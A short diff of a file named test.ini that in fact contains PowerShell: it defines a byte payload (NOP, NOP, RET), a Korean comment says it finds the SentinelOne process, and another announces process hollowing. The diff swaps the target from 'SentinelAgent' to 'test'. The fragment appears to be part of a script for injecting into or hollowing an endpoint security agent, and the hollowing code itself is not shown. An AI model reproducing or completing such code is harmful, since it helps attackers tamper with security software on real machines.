--- a/test.ini
+++ b/test.ini
@@ -6,7 +6,7 @@ Add-Type -TypeDefinition $csCode -Language CSharp
 $payload = [byte[]] (0x90, 0x90, 0xC3)
 
 # SentinelOne 프로세스 찾기
-$proc = Get-Process | Where-Object { $_.ProcessName -eq "SentinelAgent" }
+$proc = Get-Process | Where-Object { $_.ProcessName -eq "test" }
 $pid = $proc.Id
 
 # Process Hollowing 실행
